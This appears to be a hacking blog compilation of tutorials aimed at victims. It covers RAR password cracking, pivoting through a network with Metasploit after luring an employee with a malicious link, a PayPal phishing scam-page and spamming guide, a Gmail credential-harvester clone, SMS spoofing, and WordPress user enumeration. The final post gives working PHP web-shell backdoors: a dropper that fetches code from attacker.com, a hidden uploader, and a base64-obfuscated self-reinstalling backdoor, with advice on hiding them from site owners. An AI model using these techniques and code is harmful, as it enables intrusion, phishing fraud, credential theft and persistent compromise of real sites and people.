Hacking

Sunday, 23 November 2014

RAR password cracking with cRARk

cRARk is a .rar archive password cracker, but unlike rarcrack, can be customised to a far greater extent to allow partial passwords, wordlists, complementing wordlists with characters and more.
Also this programme is CUDA enabled which allows for a vast increase in testing speed.
This of course only if you have a capable graphics card. (http://www.nvidia.com/object/cuda_gpus.html)

cRARk is not installed by default on BT4 Final, a shame really as it is more versatile than rarcrack in my opinion. To install it though is a piece of cake ;

apt-get install crark

! During the install, the program tried to install the CUDA dependacies as well, in order for this to work properly you will need to exit 'X'. To do this press Ctrl + Del + Backspace to get back into Command Line only.
So seems best way to install is to get online, then quit X with Ctrl + Del + Backspace, and then run the apt-get install from the command line interface.

The machine I installed it onto does not have any CUDA capabilities, so this post will only go through some of the functions of cRARk without testing the CUDA improvements on cracking speed.
I may later try to do a full HDD install on my desktop to see if I can get my 8800GTS to work.

So after installing cRARk, lets fire it up through either the menu;
Start/Dragon --> Backtrack --> Privilage Escalation --> Password Attacks --> OfflineAttacks --> Crark
or command line ;
cd /pentest/passwords/crark/

Lets check out the files the readme's and what general options are advised;
ls
./crark

BRUTEFORCE ATTACKS
================

To start off we need to create the password.def file. To do this simply copy either the english.def file or the crackme.def file to password.def ;
cp crackme.def password.def

Then to modify the password.def file to reflect the options we want to use.

Here I will be working with simple password protected files stored on my flashdrive (mounted on /media/8GB/)

Testing password protected test100.rar file with password 100 ;

nano password.def
Under the double hash enter the testing methods desired, in this case as only numbers ;
[$1] *
Save and exit

As my system cannot use CUDA I will disable it with the -c command when testing.

./crark -c /media/8GB/test100.rar

For checking password protected testabc.rar file with lowercase letters only ;

nano password.def
[$a] *
Save and exit.

./crark -c /media/8GB/testabc.rar

For checking a password protected test-ABC.rar with uppercase characters only ;

nano password.def
[$A] *
Save and exit

./crark -c /media/8GB/test-ABC.rar

To check all of the above on password protected testaB1.rar ;

nano password.def
[$a $A $1] *
Save and exit

./crark -c /media/8GB/testaB1.rar

!! It is important to note that cRARk will start checking based on the same sequence as the characters are entered in the definition file.
So in the above example entering the character information in the definition file as $1 $a $A would take a lot longer to find the password then if using $a $A $1 .

The end result will be the same, cRARk will find the password, but the time needed for checking will be severely affected.
(I thought I had messed up somewhere earlier on when I changed character sequence in definition file and it took longer than previous attempts).

To go all out and also include special characters ;
nano password.def
[$a $A $1 $!] *
Save and exit.

To test the password.def file and see whether the commands are going to work OK, the programme can test run the definitions using the -v option ;

./crark -c -v /media/8GB/test100.rar

This wont actually start the cracking process, but will print the characters on screen so you can check whether its doing what you want it to.

To specify the number of characters, the options -l & -g can be used.
So to specify a minimum of 3 characters and a maximum of 5 characters;

./crark -c -l3 -g5 /media/8GB/testabc.rar

The bruteforce attempts resulted in an average of around 60 pass/sec on my netbook and around 160 pass/sec on my desktop (windows version of cRARk).
With CUDA this will be greatly enhanced, but have to see if/when I can get that going.

WORDLIST/DICTIONARY ATTACKS
======================

cRARk also has the option to check passwords from a wordlist file.
To do this the password.def file needs to be adjusted to specify the location of the wordlist with $w, in this case I have copied a small english wordlist called english.dic into cRARk's directory.
(You can of course also specify an alternative location where the wordlist is)

Then we need to specify that cRARk will use a wordlist in password.def ;

nano password.def
$w = "english.dic"
##
$w
Save and exit.

./crark -c /media/8GB/testAmsterdam.rar

The dictionary attacks averaged around 20 pass/sec on my netbook and I understand that there is no CUDA support for the dictionary attacks..
So having a focussed wordlist is a must !

To allow an easier choice of options, it is also possible to prepare some definition files and then specify these with the -p option.
For instance you can prepare a .def file which will use a wordlist file as follows and then keep there for future use ;

cp password.def wordlist.def

Then to specify to use the newly created wordlist.def file, the -p option is included ;

./crark -c -pwordlist.def /media/8GB/testAmsterdam.rar

There are a huge number of options to play with when it comes to the wordlist usage, extra options can be included to capitalize / invert / mashup / add numbers etc etc etc

I may update the post to show some of these options on a test wordlist.

It will be interesting to see how far I can get with the CUDA side of things, however that would mean a full HDD install on the desktop (doesnt work in VMware).

ADVANCED DICTIONARY OPTIONS

Following some queries in the comments I got to checking how the wordlist and the wordlist
manipulations work.
It truly is fantastically (and terrifyingly) customizable..

If for instance you have a list of words and you know that the password is a combination
of a couple of these words, then you can tell crark to do that in the .def file as follows;
For 2 words from the wordlist in succession;

wordlist.def
$w = "wordlist.txt"
##
$w $w

For 3 words from the wordlist in succession;

wordlist.def
$w = "wordlist.txt"
##
$w $w $w

If you have 2 wordlists and you know that the password will be a combination of
words of the 2 lists (only 1 way, so words from 2nd list appended to words from 1st list for instance)
then you can identify the 2nd wordlist with the $u function ;

wordlist.def
$u = "wordlist1.txt"
$w = "wordlist2.txt"
##
$u $w

So in the above all words from wordlist2.txt will be suffixed/appended to each word in wordlist1.

And of course any number of combinations of the above can be made.

In the below example ;
wordlist.def
$w = "test1.txt"
$u = "test2.txt"
##
$u$w$u

Author's Helpfile & Linkage ;
http://www.crark.net/cRARk.html

Video on the above ;
http://blip.tv/file/3275276
or
http://www.youtube.com/watch?v=viYdoZiCYaA

How to Pivot from Victim System to Owning the Network with Metasploit

To own a network and retrieve the key data,
we only need to find ONE weak link in the network.
It makes little sense to beat our heads against heavily fortified systems like the file and database server when we can take advantage of the weakest link of all:
Humans. (I wish the weakest link of all were Robots… maybe some other time)

Somewhere on the network,
some clerk with little work to do and lots of time to play on the Internet can be enticed to visit our malicious website,
open our malicious Word doc, or view our malicious PDF.

Once we compromise this single target on the network,
we can then pivot from that single compromised system to
own the network and ultimately grab the goodies on the server or database server.

In this tutorial, we will look at how to pivot from a single compromised system on the network to compromise and
own the most heavily fortified servers on the network.
Once you find that single weak link, then you go after the BIG BOYS!

Step 1: Compromise a Client

The first step, of course, is to compromise a single machine on the network.
In the diagram above, let’s go after someone in the engineering department.
We can do this by sending them a malicious link, PDF, or Word doc, or by going after an unpatched operating system.
Any of these and many others will work.

In my case here, I’m going to use a malicious link and send it via email to one of the people on the engineering department
with a note that says it’s a “hilarious video” they need to see. Let’s create that link.

Step 2: Open Metasploit

Fire up BackTrack or Kali and open the Metasploit console.

Step 3: Choose an Exploit

In this case,
I am using the ie_unsafe_scripting exploit, but any exploit will work.
We simply need to find ONE system on the network that is vulnerable to own the entire network.

If you are unsure about how to do this,
take a look at this tutorial or this this guide.
Either will work, as well as many others.

Step 4: Get Meterpreter

Once the victim opens the malicious link,
we get a meterpreter prompt like that below. From the meterpreter prompt, we can type:

meterpreter > ipconfig

This will reveal to us the network interfaces on our target system and the IP and MAC addresses associated
with each of them.
As you would expect, Interface 1 is the loopback interface,
and in this case, Interface
2 is associated with IP 192.168.1.101.

Your results may be different based upon the configuration of the compromised machine.

Step 5: Scan the Network

Now that we are inside the network,
we can use an auxiliary module in Metasploit called arp_scanner, which enables us to use the ARP protocol to
discover other internal systems on the network similar to the Netdiscover tool. Let’s type:

meterpreter > run arpscanner -h

This gives us a help screen for Metasploit’s arp_scanner.

Now to run the arp_scanner, we can type:

meterpreter > run arp_scanner -r 192.168.1.0/24

Where:

run is the command to execute internal meterpreter scripts

-r precedes the target address range or CIDR notation network

192.168.1.0/24 is the CIDR notation to include this entire internal Class C network with a netmask of 255.255.255.0

Running the arp scanner reveals all the systems on the internal network.
For our purposes here, the default gateway at 192.168.1.1, is probably the most important.

Step 6: Add a Route

In the final step, we will background our meterpreter session (this simply puts our
meterpreter session into the background meaning it is still running, but we can go back to the metaspliot console and run other commands). Then
we would add a route from the default gateway to our compromised system so that
ALL traffic from the default gateway must be routed through the compromised machine.

In this way,
we will have access to all systems and subnets that access that default gateway,
enabling us to compromise them as well.

Now that we have successfully added the route between the default gateway and our victim computer,
the network is—for all intents and purposes—OURS!
We can now use that single compromised machine to attack all the systems on the network
both within the engineering subnet and all the subnets that use the default gateway.

Of course, to own those machines,
we will have to take the final step of running an exploit against each of those machines,
but we will no longer have to be concerned about Intrusion Prevention Systems
(IPS) and firewalls as we are now attacking from INSIDE the network!

World

This stuff we need for do spamming.

1 :=> Cpannel

2 :=> MAILLER OR SMTP

3 :=> SCAM PAGE

4 :=> LEADS (email’s)

Chapter 1

SETUP SCAM PAGE IN CPANNEL

1 :=> The most knobs ask me how Cpanne
looks like n how I can upload scam page in Cpannel. So the
ans in here look in fig 1…..

Now you know how Cpannel look likes and
now we need to change our result email in scam page and
upload our scam page in Cpannel. Let’s see how we can do this

Changing email :=> Unzip your scam page and find the PHP file where we can change our email result. Like this as shown in fig 2

First login into Cpannel and then click Sub domain option u can see in fig 1.
Than make a sub domain and click to document root to upload your scam
page and then upload it you can see in fig 3

After click here one page will
open like this here u can upload ur scam page zip file.
As you can see in fig 4

Now we uploaded our scam page successfully. After uploaded
scam page extract your zip file from extract option.
Now we setup scamp page setup successfully here look likes.

If anyone login in this page you will found id n pass in your mail account.

CHAPTER 2

MAIL SENDING WITH PHP INBOX MAILLER

2 :=> Open PayPal letter n change the scam page link with your
new scam page link. Like we change email address in scam page.

Now we need to send mail’s to our victims than they found your mail
and some of them login and you found your hack result.

Now our work done our victims found our fake email’s n they think that
PayPal message to update his or her account information and they click
our scam page link. After that we found victims email n pass (login’s ) : D .

In next part I will teach you how to do with SMTP.

Scanning WordPress Using WP Scanner

Scanning WordPress Using WP Scanner
Hello Everyone, today I’m going to explain how to scan your WordPress or your website using WP Scanner and it is very easy, I’m going to use my website as a demonstration
So shall we start?
First off, I’m using Kali Linux as far i know this tool is programmed using ruby so you can download ruby on your windows and download the WPSCAN tool.
Note: As the Ethical Hacking is allowed in world-wide we are doing this tutorials only for educational purposes also to protect you from vulnerability and hackers, we are not responsible for bad using of this tool.
So as we said before open the Terminal or Command line and lets try to get the username of the target website, by that we are using this command:1

wpscan --url security-dz.com --enumerate u

And the result is as shown in the bellow picture:

Their some people asking what is the purpose of getting the Administration username, and that the username is used to Brute Force into the administration panel that’s why the hacker get it
Now let’s try to scan the whole script and plugin to see if we have errors or vulnerability that can be a cause of hacking our website by writing this command:1

wpscan --url security-dz.com

and the result is shown in the picture below:

As you can see i found an error and it was full path disclosure also it will give you a full report about the vulnerability and a reference in a security web how to exploit it and how to fix it.
Please if you have any question feel free to ask me the comment section below.

Harvester Tut

Credential Harvester Tutorial

What is the social engineer toolkit?
The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 9 months since its release,“Metasploit: The Penetrations Testers Guide” written by TrustedSec’s founder as well as Devon Kearns, Jim O’Gorman, and Mati Aharoni.

SET is included in the latest version of the most popular Linux distribution focused on security, Back|Track. It can also be downloaded through github using the following command:
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/https://www.trustedsec.com/downloads/social-engineer-toolkit/

Alright so getting started! first navigate to S.E.T. : Applications>Kali Linux>Exploitation tools>Social Engineer Toolkit

Now we should be at the main S.E.T screen as shown
Image has been scaled down 16% (870x490). Click this bar to view original image (1024x576). Click image to open in new window.

Now if you noticed there all numbered so i am just going to direct you which numbers to choose from here on out as to avoid tons of pics!

First choose 1: Social Engineering attacks
Second choose 2: Website attack vectors
Third choose 3: (Ironically lol) Credential Harvester Attack Method
Fourth choose 2: Site cloner
Now if your on linux (which you should be ) lol Do a "ifconfig" really quick in terminal and get your IP
If your on windows CMD "ipconfig"

Now type in your IP where it asks for it!
Then it will prompt you for a Website to clone really quick for example i used gmail! http://www.gmail.com

Now you should have a Blue text saying Credential Harvester with the port number as shown below
Image has been scaled down 16% (870x490). Click this bar to view original image (1024x576). Click image to open in new window.

If your shit looks like the pic above your good to go haha
Now everything is quite simple ( as if it wasnt already ) all we are going to do is send our IP to our victim! i suggest shortening the link so he dosnt see a random sketch IP

As soon as our victim clicks the link he will be directed to a IDENTICAL gmail login page and hopefully dumb enough to log in

Image has been scaled down 16% (870x490). Click this bar to view original image (1024x576). Click image to open in new window.

As soon as he fills this out and clicks login The username and password will be captured and sent to your S.E.T session as shown below

Image has been scaled down 16% (870x490). Click this bar to view original image (1024x576). Click image to open in new window.

Well thats it for today folks hope youve enjoyed the Tut and find it useful lol

BackTrack and Kali SMS Spoofing

Well guys, I just learned how to do this and decided to make a tutorial.
This would have been great to use in my Spotify method, were it still operational.
Enjoy the following content, which I drafted myself (borrowed a photo or two).
Purely for educational purposes, I'm not responsible for your actions.

What is SMS Spoofing?
SMS spoofing is the method of sending text messages, and making them appearing to have come from a predetermined sender.
if the messages are replied to, the responses will be delivered to the number from which it appears that the message were sent.

How does it work?
The message is composed, and then right before being sent the final message draft is edited so that the actual sender is replaced with either another number or text.

So, What do I need to spoof SMS?
Backtrack 5.
Any version will work as long as it has Social Engineering Tools.

That's awesome! How do I make it work?
Follow the steps below.

Download and Install Backtrack / Live Boot Backtrack
Navigate to "Applications" > "Backtrack" > "Exploitation Tools" > "Social Engineering Tools" > "SET
Press 1, followed by Enter, to open up the menu for "Social Engineering Attacks"
Image (Click to Hide)

Press 7, followed by Enter, to specify SMS Spoofing attack.
Press 1, followed by Enter, to launch an attack on a single number.
You will be required to input your victim's cell number.
Image (Click to Hide)

Decide to craft a one time message, or to use a predefined template.

Play around, and have fun with it.

Shell Security and Backdoors 101

Shell Safety and Backdooring

Today, I will be giving a small tutorial on shell safety and backdooring your hacked websites.

I will also include some tools and code for you to use to help you on your journey.

There are many reasons for shell safety and adding a backdoor into a website that are beneficial. Here are a few.
- Keep from losing access to the site
- Keep other hackers from finding your shell
- Reupload files if the webmaster / server owners find and delete your files
- Load malware/redirect/steal cookies/etc..

So, I assume that you have a shell uploaded to a hacked server. You are sitting there, trying to figure out what you want to do with it. There are a few scenarios right off hand.

(non preferred) Deface that bastard: Well, you could ruin their index with your cheap flashing deface page with all your "greetz" to your homies and lose all your access.
(preferred) Backdoor the bitch: You could place backdoors in some of their code. Where and such depends on the code your entering.
(better than defacing but not as good as backdooring) Just leave your shell, keep url and hope it stays

So, with these options, I will stick to the preferred methods.

Lets begin with shell security.

#1 - First off, any GOOD shell will be password protected. When deciding your password, make an md5 hash of it and search for it on google. If yours can be found, choose a different path. This has let me into so many shells its rediculous.

#2 - Another good thing to have with your shell, is a basic hidden 404 page when visiting and no session has been started with it. Example: My 404 shell. This will throw people off thinking its really a page not found and such.

#3 - You also wan't to make sure your shell can't be found through text and such that shows up through dorking search engines. People will steal your shell this way.

#4 - The next important thing, is not to upload too many things, db connectors, mass defacers etc.. and when you do ALWAYS DELETE THEM AFTERWARDS. You never want to leave more than 1 shell (not even recommended, I will cover this very soon) and a backdoor.

#5 - ALWAYS make sure your shell is encoded, and hard to decode.

There are a few tips for shell security. Lets move on to backdooring, which is the best thing possible.

Backdoors are the way to go. Period. I code 90% of my backdoors in PHP. I have several different ones as they all have a different purpose. I will now give you some examples of some simple backdoors and explain their function.

#1 - Basics of a backdoor
You have 3 good options here. Insert code to be run everytime a page is visited, Do different functions via a get request, or less likely, using POST variables.
An example of having a backdoor run everytime the page is visited, could be to recreate your shell if it happen to be deleted, to log login information or something like that, which I frown upon really.

The best method for my own uses is to get it to show via get request. Example: hacked.com/hackeddir/index.php?backdoor which would then show my backdoor and let me use my options.

So, what should we have in our backdoor? Well, First I assume that you want to keep your shell on the server or recreate it when it's deleted. Lets work on this!

Lets say you have a shell and can write to the index file. hacked.com/index.php.

Here is a small example of their index.

Code:
<html>
<head>
blahsldfja
</head>
<body>
php code blah blah here
</body>
</html>

To start a backdoor code in it. go to after the </html> tag and put in the following.

PHP Code:
<?phpif(isset($_GET['makeshell'])){
$filename = $_GET['makeshell'];
$shelltxt = "URL TO TEXT FILE WITH SHELL CODING IN IT";
$getcode = file_get_contents($shelltxt);
$file = fopen($filename, 'w');
fwrite($file, $getcode);
echo "Shell Created: <a href='$filename'>Link</a>";
}?>
Replace the "URL TO TEXT FILE WITH SHELL CODING IN IT" with something like http://attacker.com/shell.txt

Now, the url to utilize this would be index.php?makeshell=shellname.php (replace shellname.php with what you want your file to be)

Then, you can go to hackedsite.com/shellname.php and viola! You got a shell made on the fly! Simple enough right? Lets go a little more in depth.

Say instead of making a shell, you just want ability to upload files (better than hosting a url to your shell file).

You could use the following code after </html>

PHP Code:
<?php
if(isset($_GET['kupload'])){
    define("MAX_FILE_SIZE", 99999999999999999); // Maximum file size is 10 mb, 10485760 is in bytes

    if(isset($_POST['submit'])) {
        // Files variables
        $file_name    = $_FILES['file']['name']; // File name
        $file_size    = $_FILES['file']['size']; // File size
        $file_type    = $_FILES['file']['type']; // The file type, if we want to upload a determinated type of file
        $file_temp    = $_FILES['file']['tmp_name']; // Our temporaney file
        $file_error = $_FILES['file']['error']; // The files errors
        $file_dest    = basename($file_name); // File destination

        if ($file_size <= MAX_FILE_SIZE) {
        // Uploading file
            if(move_uploaded_file($file_temp, $file_dest))
            {
                echo 'File uploaded: '.$file_dest;
                echo '<p><a href="'.$file_dest.'">go to file</a> </p>';
             }
            else
            {
                echo 'Error: '.$file_error;
            }
        } else {
            echo "This file is too big!";
        }

    } else {

        // Uploading form
        echo '<h1>add file</h1>';
        echo '<form method="post" action="" enctype="multipart/form-data">
              file: <input type="file" name="file"><br /><br />

              <input type="submit" name="submit" class="button" value="Upload">

              </form>';
        echo '</div>';
    }
}?>

The url to get this would be http://www.hacked.com/index.php?kupload ((**NOTE** I use kupload as just "upload" is used, and i want mine to be unique!))

You would be given an upload box, simply upload any file as long as its not too big, then you don't have to wory about giving away a link to a shell script or anything like that.

You can also combine both of the above, so you can quickly make a shell or upload form.

There is an unlimited amount of things you can include with this. You can make your backdoor do pretty much anything!

Another little trick, is to use two backdoors, that also remake the other backdoor incase one gets deleted. Obviously its all about how well you hide your backdoor along with how much the owner of the website really pay attention.

So how would you go about this you ask? Let me show you an example.

Say you have two files. Index.php in the main directory, admin.php in /admin/ directory.

In index.php enter this code.

PHP Code:
<?php
$shell2 = "admin/admin.php";$contents = file_get_contents($shell2);$pattern = '/kupload/';$bdcode = "?><?php ".base64_decode("ICBpZihpc3NldCgkX0dFVFsncHduZWQnXSkpew0KICAgIGRlZmluZSgiTUFYX0ZJTEVfU0laRSIsIDk5OTk5OTk5OTk5OTk5OTk5KTsgLy8gTWF4aW11bSBmaWxlIHNpemUgaXMgMTAgbWIsIDEwNDg1NzYwIGlzIGluIGJ5dGVzIA0KDQogICAgaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpIHsNCiAgICAgICAgLy8gRmlsZXMgdmFyaWFibGVzIA0KICAgICAgICAkZmlsZV9uYW1lICAgID0gJF9GSUxFU1snZmlsZSddWyduYW1lJ107IC8vIEZpbGUgbmFtZSANCiAgICAgICAgJGZpbGVfc2l6ZSAgICA9ICRfRklMRVNbJ2ZpbGUnXVsnc2l6ZSddOyAvLyBGaWxlIHNpemUgDQogICAgICAgICRmaWxlX3R5cGUgICAgPSAkX0ZJTEVTWydmaWxlJ11bJ3R5cGUnXTsgLy8gVGhlIGZpbGUgdHlwZSwgaWYgd2Ugd2FudCB0byB1cGxvYWQgYSBkZXRlcm1pbmF0ZWQgdHlwZSBvZiBmaWxlIA0KICAgICAgICAkZmlsZV90ZW1wICAgID0gJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddOyAvLyBPdXIgdGVtcG9yYW5leSBmaWxlIA0KICAgICAgICAkZmlsZV9lcnJvciA9ICRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXTsgLy8gVGhlIGZpbGVzIGVycm9ycyANCiAgICAgICAgJGZpbGVfZGVzdCAgICA9IGJhc2VuYW1lKCRmaWxlX25hbWUpOyAvLyBGaWxlIGRlc3RpbmF0aW9uIA0KIA0KICAgICAgICBpZiAoJGZpbGVfc2l6ZSA8PSBNQVhfRklMRV9TSVpFKSB7IA0KICAgICAgICAvLyBVcGxvYWRpbmcgZmlsZSANCiAgICAgICAgICAgIGlmKG1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZV90ZW1wLCAkZmlsZV9kZXN0KSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBlY2hvICdGaWxlIHVwbG9hZGVkOiAnLiRmaWxlX2Rlc3Q7DQogICAgICAgICAgICAgICAgZWNobyAnPHA+PGEgaHJlZj0iJy4kZmlsZV9kZXN0LiciPmdvIHRvIGZpbGU8L2E+IDwvcD4nOw0KIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIGVjaG8gJ0Vycm9yOiAnLiRmaWxlX2Vycm9yOyANCiAgICAgICAgICAgIH0NCiAgICAgICAgfSBlbHNlIHsgDQogICAgICAgICAgICBlY2hvICJUaGlzIGZpbGUgaXMgdG9vIGJpZyEiOyANCiAgICAgICAgfSANCg0KICAgIH0gZWxzZSB7IA0KICAgIA0KICAgICAgICAvLyBVcGxvYWRpbmcgZm9ybSANCiAgICAgICAgZWNobyAnPGgxPmFkZCBmaWxlPC9oMT4nOw0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4gDQogICAgICAgICAgICAgIGZpbGU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIj48YnIgLz48YnIgLz4NCiAgICAgICAgICAgICAgDQogICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiIgdmFsdWU9IlVwbG9hZCI+DQogICAgICAgICAgICAgIA0KICAgICAgICAgICAgICA8L2Zvcm0+JzsgDQogICAgICAgIGVjaG8gJzwvZGl2Pic7DQogICAgfSANCiAgfQ==");preg_match($pattern,$data,$match);
if(count($match)<1)
{
$file = fopen($shell2, 'a');
fwrite($file, $bdcode);
}?>

Now, everytime index.php is visited, it will check for the presence of our uploader in admin.php. If its not there, it will readd it, if it is there, it does nothing.
With a little modification, you could put the same in admin.php to check index.php for the same thing. That way, its way more likely that you will keep the backdoors for as long as possible.

Also, its a very smart idea to encode all of your backdoors. The more its encoded the better.

I hope you have enjoyed this small tutorial, I plan on making a part 2 to this with more sophisticated code